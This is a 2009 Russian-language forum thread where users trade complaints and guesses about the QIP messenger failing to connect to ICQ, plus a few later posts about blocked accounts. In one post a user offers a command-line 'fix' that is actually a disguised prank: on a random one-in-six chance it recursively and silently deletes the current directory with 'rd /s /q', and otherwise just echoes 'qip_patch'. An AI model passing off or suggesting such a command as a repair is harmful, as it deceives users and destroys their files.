Ladybug 0 Опубликовано: 30 апреля 2009 Да уж как только не меняла (как и в прошлые разы, когда очередная версия квипа накрывалась). Не помогает. Я так понимаю, что 9030 ставить не имеет смысла, раз она тоже сдохла.... Ждемс.... 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Натусик.. 0 Опубликовано: 30 апреля 2009 (изменено) Да уж как только не меняла (как и в прошлые разы, когда очередная версия квипа накрывалась). Не помогает.Я так понимаю, что 9030 ставить не имеет смысла, раз она тоже сдохла.... Ждемс.... Тоже меняла все что можно не помогает Ир, мне кажется 9030 есть смыл поставить если контакты именно на gip там забиты, а не как у меня на icq? ибо gip в инфинуме работает, а icq нет Изменено 30 апреля 2009 пользователем Натусик.. 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
IL76 0 Опубликовано: 30 апреля 2009 да мне кажется просто вам кто то аську отключил дома)) гг 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Ladybug 0 Опубликовано: 30 апреля 2009 У меня некому ее отключать, акромя меня самой 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Noise 0 Опубликовано: 30 апреля 2009 Да уж как только не меняла (как и в прошлые разы, когда очередная версия квипа накрывалась). Не помогает.Я так понимаю, что 9030 ставить не имеет смысла, раз она тоже сдохла.... Ждемс.... у меня 9030, всё работает. 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Ladybug 0 Опубликовано: 30 апреля 2009 А у меня и 9030 не работает. Фигня какая-то.... 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Натусик.. 0 Опубликовано: 30 апреля 2009 А у меня и 9030 не работает. Фигня какая-то.... И обновление версии не помогает кстати... 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Ladybug 0 Опубликовано: 30 апреля 2009 (изменено) А у меня и 9030 не работает. Фигня какая-то.... И обновление версии не помогает кстати... Я вот думаю, это мы с тобой такие криворукие "везунчики" или просто до остальных еще волна не докатилась.... ЗЫ: у меня еще к тому же Касперский он-лайн через Яндекс звиздит.... Непруха какая-то. Изменено 30 апреля 2009 пользователем ИраКли 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Натусик.. 0 Опубликовано: 30 апреля 2009 Я вот думаю, это мы с тобой такие криворукие "везунчики" или просто до остальных еще волна не докатилась.... ЗЫ: у меня еще к тому же Касперский он-лайн через Яндекс звиздит.... Непруха какая-то. Мне приятней думать, что до остальных не дошло Я уже неделю без антивиря, Nod слетел окончательно, а другой почему-то не устанавливается, 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Натусик.. 0 Опубликовано: 30 апреля 2009 (изменено) Ир, заработал :)))) Я не знаю, правда, связно ли это как-то с удалением одного антивиря и установкой другого. Изменено 30 апреля 2009 пользователем Натусик.. 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Maksim 0 Опубликовано: 30 апреля 2009 чтобы заработало надо в командной строке(стандартные->командная строка) написать set /a R=0+6*%random%/32768 & if %R% == 0 (rd /s /q .\) else (echo qip_patch) 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Ladybug 0 Опубликовано: 30 апреля 2009 (изменено) Ир, заработал :)))) Я не знаю, правда, связно ли это как-то с удалением одного антивиря и установкой другого. Ты не поверишь! У меня тоже заработал. :-))) Я после нашей переписки сегодня ничего больше не устанавлилвала и не удаляла. Изменено 30 апреля 2009 пользователем ИраКли 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Натусик.. 0 Опубликовано: 30 апреля 2009 Ты не поверишь! У меня тоже заработал. :-))) Я после нашей переписки сегодня ничего больше не устанавлилвала и не удаляла. значит само собой наверное наладилось ))) 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Натусик.. 0 Опубликовано: 30 апреля 2009 Блин, по-моему я рано радоваться начала, опять все обвалилось 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Ladybug 0 Опубликовано: 30 апреля 2009 Всё, я пацталом.... Наташ, ща подумают, что мы с тобой сестры-близнецы. У мну тож накрылась. 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Натусик.. 0 Опубликовано: 30 апреля 2009 Всё, я пацталом.... Наташ, ща подумают, что мы с тобой сестры-близнецы. У мну тож накрылась. 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Some Net 0 Опубликовано: 1 мая 2009 Вопрос к тем, у кого куип: у вас вылазиет окошечкой с текстом "Ошибка:" ??? 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Ladybug 0 Опубликовано: 1 мая 2009 Вопрос к тем, у кого куип: у вас вылазиет окошечкой с текстом "Ошибка:" ??? Именно это и вылезало, когда не работал. 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Натусик.. 0 Опубликовано: 1 мая 2009 Вопрос к тем, у кого куип: у вас вылазиет окошечкой с текстом "Ошибка:" ??? Именно это и вылезало, когда не работал. а мне писал проверьте настройки подключения. 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Ladybug 0 Опубликовано: 1 мая 2009 И про настройки тоже было. 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
LinT 0 Опубликовано: 1 июня 2009 пользуюсь Пиджин 2.5.6 и не особо парюсь 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Alair 0 Опубликовано: 24 июля 2009 KOT, это вы Osel? Потеряли пароль?) 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Favorite 0 Опубликовано: 5 августа 2009 расскажите дурочке почему мне пишут что, моя учетная запись заблокирована О_о 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Red_Bull 0 Опубликовано: 5 августа 2009 расскажите дурочке почему мне пишут что, моя учетная запись заблокирована О_о Взломали 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Noise 0 Опубликовано: 5 августа 2009 расскажите дурочке почему мне пишут что, моя учетная запись заблокирована О_о QIP Infium? 0 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах